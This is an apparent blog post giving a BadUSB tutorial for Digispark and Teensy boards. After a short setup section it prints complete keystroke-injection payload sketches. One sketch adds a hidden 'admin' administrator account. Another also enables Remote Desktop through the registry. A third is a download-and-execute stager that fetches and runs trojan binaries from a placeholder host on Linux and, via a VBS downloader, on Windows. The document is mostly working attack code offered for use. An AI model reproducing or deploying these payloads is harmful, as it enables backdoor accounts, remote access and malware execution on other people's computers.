标签:registry term creat obj park ted ons ODB jad
Badusb easy_makearduino IDE
download address: https://www.arduino.cc/en/Main/Software
arduino grammar
learn address: https://www.w3cschool.cn/arduino/arduino_overview.html
Teensy ++ 2.0 or Badusb Rubber duck
about 35¥
Teensyduino Plug-in(when you choose Teensy ++ 2.0)
download address: https://www.pjrc.com/teensy/td_download.html
my equip is digispark shell attiny85, which is kind in Rubber duck
Install DPinst64.exe(64 bit computer),DPinst.exe(32 bit computer)
file->preference
add http://digistump.com/package_digistump_index.json
in end
just wait seconds
than find this one
install it
choose
Digispark
USBinyTSPTools -> Board : -> DIgispark(DEfault - 1605mhz)
Tools -> Programmer: -> USBtinyIsb
write code
#include "DigiKeyboard.h"
void setup() {
// put your setup code here, to run once:
DigiKeyboard.delay(2000); // 开机延迟两秒钟,用于系统识别Digispark
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // 按R和win键,打开运行
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyPress(MOD_SHIFT_LEFT); // 按住左SHIFT,绕过输入法
DigiKeyboard.println("calc");
DigiKeyboard.sendKeyPress(0); // 松开
DigiKeyboard.sendKeyStroke(KEY_ENTER); // 按回车
DigiKeyboard.delay(2000);
}
void loop() {
// put your main code here, to run repeatedly:
}insert usb behind upload code
this code is use in teensy++2.0
Add Administrator
User:admin
Password:admin
int myKeyBreak = 50;
void setup() {
delay(5000);
omg("cmd");
delay(500);
Keyboard.println("color a&&cls");
delay(myKeyBreak);
ascii_println("net user admin admin /add");
delay(myKeyBreak);
ascii_println("net localgroup administrators admin /add");
delay(myKeyBreak);
ascii_println("echo Hacked Finish!");
delay(myKeyBreak);
ascii_println("exit");
delay(myKeyBreak);
delay(10000);
}
void loop() {
}
void ascii_println(char *string)
{
ascii_type_this(string);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(100);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
}
void ascii_type_this(char *string)
{
int count, length;
length = strlen(string);
for(count = 0 ; count < length ; count++)
{
char a = string[count];
ascii_input(ascii_convert(a));
}
}
void ascii_input(char *string)
{
if (string == "000") return;
int count, length;
length = strlen(string);
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.send_now();
for(count = 0 ; count < length ; count++)
{
char a = string[count];
if (a == '1') Keyboard.set_key1(KEYPAD_1);
if (a == '2') Keyboard.set_key1(KEYPAD_2);
if (a == '3') Keyboard.set_key1(KEYPAD_3);
if (a == '4') Keyboard.set_key1(KEYPAD_4);
if (a == '5') Keyboard.set_key1(KEYPAD_5);
if (a == '6') Keyboard.set_key1(KEYPAD_6);
if (a == '7') Keyboard.set_key1(KEYPAD_7);
if (a == '8') Keyboard.set_key1(KEYPAD_8);
if (a == '9') Keyboard.set_key1(KEYPAD_9);
if (a == '0') Keyboard.set_key1(KEYPAD_0);
Keyboard.send_now();
Keyboard.set_key1(0);
delay(11);
Keyboard.send_now();
}
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
char* ascii_convert(char string)
{
if (string == 'T') return "84";
if (string == ' ') return "32";
if (string == '!') return "33";
if (string == '\"') return "34";
if (string == '#') return "35";
if (string == '$') return "36";
if (string == '%') return "37";
if (string == '&') return "38";
if (string == '\'') return "39";
if (string == '(') return "40";
if (string == ')') return "41";
if (string == '*') return "42";
if (string == '+') return "43";
if (string == ',') return "44";
if (string == '-') return "45";
if (string == '.') return "46";
if (string == '/') return "47";
if (string == '0') return "48";
if (string == '1') return "49";
if (string == '2') return "50";
if (string == '3') return "51";
if (string == '4') return "52";
if (string == '5') return "53";
if (string == '6') return "54";
if (string == '7') return "55";
if (string == '8') return "56";
if (string == '9') return "57";
if (string == ':') return "58";
if (string == ';') return "59";
if (string == '<') return "60";
if (string == '=') return "61";
if (string == '>') return "62";
if (string == '?') return "63";
if (string == '@') return "64";
if (string == 'A') return "65";
if (string == 'B') return "66";
if (string == 'C') return "67";
if (string == 'D') return "68";
if (string == 'E') return "69";
if (string == 'F') return "70";
if (string == 'G') return "71";
if (string == 'H') return "72";
if (string == 'I') return "73";
if (string == 'J') return "74";
if (string == 'K') return "75";
if (string == 'L') return "76";
if (string == 'M') return "77";
if (string == 'N') return "78";
if (string == 'O') return "79";
if (string == 'P') return "80";
if (string == 'Q') return "81";
if (string == 'R') return "82";
if (string == 'S') return "83";
if (string == 'T') return "84";
if (string == 'U') return "85";
if (string == 'V') return "86";
if (string == 'W') return "87";
if (string == 'X') return "88";
if (string == 'Y') return "89";
if (string == 'Z') return "90";
if (string == '[') return "91";
if (string == '\\') return "92";
if (string == ']') return "93";
if (string == '^') return "94";
if (string == '_') return "95";
if (string == '`') return "96";
if (string == 'a') return "97";
if (string == 'b') return "98";
if (string == 'c') return "99";
if (string == 'd') return "100";
if (string == 'e') return "101";
if (string == 'f') return "102";
if (string == 'g') return "103";
if (string == 'h') return "104";
if (string == 'i') return "105";
if (string == 'j') return "106";
if (string == 'k') return "107";
if (string == 'l') return "108";
if (string == 'm') return "109";
if (string == 'n') return "110";
if (string == 'o') return "111";
if (string == 'p') return "112";
if (string == 'q') return "113";
if (string == 'r') return "114";
if (string == 's') return "115";
if (string == 't') return "116";
if (string == 'u') return "117";
if (string == 'v') return "118";
if (string == 'w') return "119";
if (string == 'x') return "120";
if (string == 'y') return "121";
if (string == 'z') return "122";
if (string == '{') return "123";
if (string == '|') return "124";
if (string == '}') return "125";
if (string == '~') return "126";
Keyboard.print(string);
return "000";
}
void release_keys()
{
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
}
void send_keys(byte key, byte modifier)
{
if(modifier)
Keyboard.set_modifier(modifier);
Keyboard.set_key1(key);
Keyboard.send_now();
delay(100);
release_keys();
}
void omg(char *SomeCommand)
{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
ascii_type_this(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
Open 3389 port
Add user
User:admin
Password:admin
int myKeyBreak = 50;
void setup() {
delay(5000);
omg("cmd");
delay(500);
Keyboard.println("color a&&cls");
delay(myKeyBreak);
ascii_println("net user admin admin /add");
delay(myKeyBreak);
ascii_println("net localgroup administrators admin /add");
delay(myKeyBreak);
ascii_println("echo Windows Registry Editor Version 5.00>>3389.reg");
delay(myKeyBreak);
ascii_println("echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]>>3389.reg");
delay(myKeyBreak);
ascii_println("echo \"fDenyTSConnections\"=dword:00000000>>3389.reg");
delay(myKeyBreak);
ascii_println("echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp]>>3389.reg");
delay(myKeyBreak);
ascii_println("echo \"PortNumber\"=dword:00000d3d>>3389.reg");
delay(myKeyBreak);
ascii_println("echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]>>3389.reg");
delay(myKeyBreak);
ascii_println("echo \"PortNumber\"=dword:00000d3d>>3389.reg");
delay(myKeyBreak);
ascii_println("regedit /s 3389.reg");
delay(myKeyBreak);
ascii_println("del 3389.reg");
delay(myKeyBreak);
ascii_println("echo Hacked Finish!");
delay(myKeyBreak);
ascii_println("exit");
delay(myKeyBreak);
delay(10000);
}
void loop() {
}
void ascii_println(char *string)
{
ascii_type_this(string);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(100);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
}
void ascii_type_this(char *string)
{
int count, length;
length = strlen(string);
for(count = 0 ; count < length ; count++)
{
char a = string[count];
ascii_input(ascii_convert(a));
}
}
void ascii_input(char *string)
{
if (string == "000") return;
int count, length;
length = strlen(string);
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.send_now();
for(count = 0 ; count < length ; count++)
{
char a = string[count];
if (a == '1') Keyboard.set_key1(KEYPAD_1);
if (a == '2') Keyboard.set_key1(KEYPAD_2);
if (a == '3') Keyboard.set_key1(KEYPAD_3);
if (a == '4') Keyboard.set_key1(KEYPAD_4);
if (a == '5') Keyboard.set_key1(KEYPAD_5);
if (a == '6') Keyboard.set_key1(KEYPAD_6);
if (a == '7') Keyboard.set_key1(KEYPAD_7);
if (a == '8') Keyboard.set_key1(KEYPAD_8);
if (a == '9') Keyboard.set_key1(KEYPAD_9);
if (a == '0') Keyboard.set_key1(KEYPAD_0);
Keyboard.send_now();
Keyboard.set_key1(0);
delay(11);
Keyboard.send_now();
}
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
char* ascii_convert(char string)
{
if (string == 'T') return "84";
if (string == ' ') return "32";
if (string == '!') return "33";
if (string == '\"') return "34";
if (string == '#') return "35";
if (string == '$') return "36";
if (string == '%') return "37";
if (string == '&') return "38";
if (string == '\'') return "39";
if (string == '(') return "40";
if (string == ')') return "41";
if (string == '*') return "42";
if (string == '+') return "43";
if (string == ',') return "44";
if (string == '-') return "45";
if (string == '.') return "46";
if (string == '/') return "47";
if (string == '0') return "48";
if (string == '1') return "49";
if (string == '2') return "50";
if (string == '3') return "51";
if (string == '4') return "52";
if (string == '5') return "53";
if (string == '6') return "54";
if (string == '7') return "55";
if (string == '8') return "56";
if (string == '9') return "57";
if (string == ':') return "58";
if (string == ';') return "59";
if (string == '<') return "60";
if (string == '=') return "61";
if (string == '>') return "62";
if (string == '?') return "63";
if (string == '@') return "64";
if (string == 'A') return "65";
if (string == 'B') return "66";
if (string == 'C') return "67";
if (string == 'D') return "68";
if (string == 'E') return "69";
if (string == 'F') return "70";
if (string == 'G') return "71";
if (string == 'H') return "72";
if (string == 'I') return "73";
if (string == 'J') return "74";
if (string == 'K') return "75";
if (string == 'L') return "76";
if (string == 'M') return "77";
if (string == 'N') return "78";
if (string == 'O') return "79";
if (string == 'P') return "80";
if (string == 'Q') return "81";
if (string == 'R') return "82";
if (string == 'S') return "83";
if (string == 'T') return "84";
if (string == 'U') return "85";
if (string == 'V') return "86";
if (string == 'W') return "87";
if (string == 'X') return "88";
if (string == 'Y') return "89";
if (string == 'Z') return "90";
if (string == '[') return "91";
if (string == '\\') return "92";
if (string == ']') return "93";
if (string == '^') return "94";
if (string == '_') return "95";
if (string == '`') return "96";
if (string == 'a') return "97";
if (string == 'b') return "98";
if (string == 'c') return "99";
if (string == 'd') return "100";
if (string == 'e') return "101";
if (string == 'f') return "102";
if (string == 'g') return "103";
if (string == 'h') return "104";
if (string == 'i') return "105";
if (string == 'j') return "106";
if (string == 'k') return "107";
if (string == 'l') return "108";
if (string == 'm') return "109";
if (string == 'n') return "110";
if (string == 'o') return "111";
if (string == 'p') return "112";
if (string == 'q') return "113";
if (string == 'r') return "114";
if (string == 's') return "115";
if (string == 't') return "116";
if (string == 'u') return "117";
if (string == 'v') return "118";
if (string == 'w') return "119";
if (string == 'x') return "120";
if (string == 'y') return "121";
if (string == 'z') return "122";
if (string == '{') return "123";
if (string == '|') return "124";
if (string == '}') return "125";
if (string == '~') return "126";
Keyboard.print(string);
return "000";
}
void release_keys()
{
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
}
void send_keys(byte key, byte modifier)
{
if(modifier)
Keyboard.set_modifier(modifier);
Keyboard.set_key1(key);
Keyboard.send_now();
delay(100);
release_keys();
}
void omg(char *SomeCommand)
{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
ascii_type_this(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}make the exe or elf by your mind
or try this
Linux Trojan Horse Address: http://www.test.com/xxoo.out
Win Trojan Horse Address: http://www.test.com/test.exe
int myKeyBreak = 50;
void setup() {
//linux downexec
delay(5000);
terminal();
delay(3000);
Keyboard.println("rm xxoo.out");
delay(2000);
Keyboard.println("wget http://www.test.com/xxoo.out -O xxoo.out");
delay(2000);
Keyboard.println("chmod +x xxoo.out");
Keyboard.println("./xxoo.out &");
delay(2000);
Keyboard.println("exit");
//win downexec
omg("cmd");
delay(500);
Keyboard.println("color a&&cls");
delay(myKeyBreak);
ascii_println("del x.exe");
delay(myKeyBreak);
ascii_println("echo strFileURL = \"http://www.test.com/test.exe\" > K8.vbs");
delay(myKeyBreak);
ascii_println("echo strHDLocation = \"x.exe\" >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo objXMLHTTP.open \"GET\", strFileURL, false >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo objXMLHTTP.send() >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo If objXMLHTTP.Status = 200 Then >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo Set objADOStream = CreateObject(\"ADODB.Stream\") >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo objADOStream.Open >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo objADOStream.Type = 1 >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo objADOStream.Write objXMLHTTP.ResponseBody >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo objADOStream.Position = 0 >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo Set objFSO = Nothing >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo objADOStream.SaveToFile strHDLocation >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo objADOStream.Close >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo Set objADOStream = Nothing >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo End if >> K8.vbs");
delay(myKeyBreak);
ascii_println("echo Set objXMLHTTP = Nothing >> K8.vbs");
delay(myKeyBreak);
//ascii_println("exit");
ascii_println("echo output vbs is Finished!");
delay(1000);
//omg("cmd /c cscript K8.vbs");
ascii_println("cscript K8.vbs");
delay(8000);
//omg("cmd /c del K8.vbs");
ascii_println("del K8.vbs");
delay(1000);
//omg("cmd /c x.exe");
ascii_println("x.exe");
delay(10000);
}
void loop() {
}
void ascii_println(char *string)
{
ascii_type_this(string);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(100);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
}
void ascii_type_this(char *string)
{
int count, length;
length = strlen(string);
for(count = 0 ; count < length ; count++)
{
char a = string[count];
ascii_input(ascii_convert(a));
}
}
void ascii_input(char *string)
{
if (string == "000") return;
int count, length;
length = strlen(string);
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.send_now();
for(count = 0 ; count < length ; count++)
{
char a = string[count];
if (a == '1') Keyboard.set_key1(KEYPAD_1);
if (a == '2') Keyboard.set_key1(KEYPAD_2);
if (a == '3') Keyboard.set_key1(KEYPAD_3);
if (a == '4') Keyboard.set_key1(KEYPAD_4);
if (a == '5') Keyboard.set_key1(KEYPAD_5);
if (a == '6') Keyboard.set_key1(KEYPAD_6);
if (a == '7') Keyboard.set_key1(KEYPAD_7);
if (a == '8') Keyboard.set_key1(KEYPAD_8);
if (a == '9') Keyboard.set_key1(KEYPAD_9);
if (a == '0') Keyboard.set_key1(KEYPAD_0);
Keyboard.send_now();
Keyboard.set_key1(0);
delay(11);
Keyboard.send_now();
}
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
char* ascii_convert(char string)
{
if (string == 'T') return "84";
if (string == ' ') return "32";
if (string == '!') return "33";
if (string == '\"') return "34";
if (string == '#') return "35";
if (string == '$') return "36";
if (string == '%') return "37";
if (string == '&') return "38";
if (string == '\'') return "39";
if (string == '(') return "40";
if (string == ')') return "41";
if (string == '*') return "42";
if (string == '+') return "43";
if (string == ',') return "44";
if (string == '-') return "45";
if (string == '.') return "46";
if (string == '/') return "47";
if (string == '0') return "48";
if (string == '1') return "49";
if (string == '2') return "50";
if (string == '3') return "51";
if (string == '4') return "52";
if (string == '5') return "53";
if (string == '6') return "54";
if (string == '7') return "55";
if (string == '8') return "56";
if (string == '9') return "57";
if (string == ':') return "58";
if (string == ';') return "59";
if (string == '<') return "60";
if (string == '=') return "61";
if (string == '>') return "62";
if (string == '?') return "63";
if (string == '@') return "64";
if (string == 'A') return "65";
if (string == 'B') return "66";
if (string == 'C') return "67";
if (string == 'D') return "68";
if (string == 'E') return "69";
if (string == 'F') return "70";
if (string == 'G') return "71";
if (string == 'H') return "72";
if (string == 'I') return "73";
if (string == 'J') return "74";
if (string == 'K') return "75";
if (string == 'L') return "76";
if (string == 'M') return "77";
if (string == 'N') return "78";
if (string == 'O') return "79";
if (string == 'P') return "80";
if (string == 'Q') return "81";
if (string == 'R') return "82";
if (string == 'S') return "83";
if (string == 'T') return "84";
if (string == 'U') return "85";
if (string == 'V') return "86";
if (string == 'W') return "87";
if (string == 'X') return "88";
if (string == 'Y') return "89";
if (string == 'Z') return "90";
if (string == '[') return "91";
if (string == '\\') return "92";
if (string == ']') return "93";
if (string == '^') return "94";
if (string == '_') return "95";
if (string == '`') return "96";
if (string == 'a') return "97";
if (string == 'b') return "98";
if (string == 'c') return "99";
if (string == 'd') return "100";
if (string == 'e') return "101";
if (string == 'f') return "102";
if (string == 'g') return "103";
if (string == 'h') return "104";
if (string == 'i') return "105";
if (string == 'j') return "106";
if (string == 'k') return "107";
if (string == 'l') return "108";
if (string == 'm') return "109";
if (string == 'n') return "110";
if (string == 'o') return "111";
if (string == 'p') return "112";
if (string == 'q') return "113";
if (string == 'r') return "114";
if (string == 's') return "115";
if (string == 't') return "116";
if (string == 'u') return "117";
if (string == 'v') return "118";
if (string == 'w') return "119";
if (string == 'x') return "120";
if (string == 'y') return "121";
if (string == 'z') return "122";
if (string == '{') return "123";
if (string == '|') return "124";
if (string == '}') return "125";
if (string == '~') return "126";
Keyboard.print(string);
return "000";
}
void release_keys()
{
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(100);
}
void send_keys(byte key, byte modifier)
{
if(modifier)
Keyboard.set_modifier(modifier);
Keyboard.set_key1(key);
Keyboard.send_now();
delay(100);
release_keys();
}
void omg(char *SomeCommand)
{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
ascii_type_this(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
void terminal()
{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
Keyboard.send_now();
Keyboard.set_key1(KEY_T);
Keyboard.send_now();
delay(100);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}https://github.com/samratashok/Kautilya
实战Teensy烧录渗透测试U盘: https://www.freebuf.com/sectool/150367.html
badusb的学习记录&入侵windows主机: https://lzy-wi.github.io/2018/06/12/badusb/
基于 Attiny 85 开发板的 BadUSB 攻击实战https://laucyun.com/d2faa91d255786348f1399d40229ee68.html
标签:registry term creat obj park ted ons ODB jad
原文地址:https://www.cnblogs.com/militray-axe/p/12249366.html
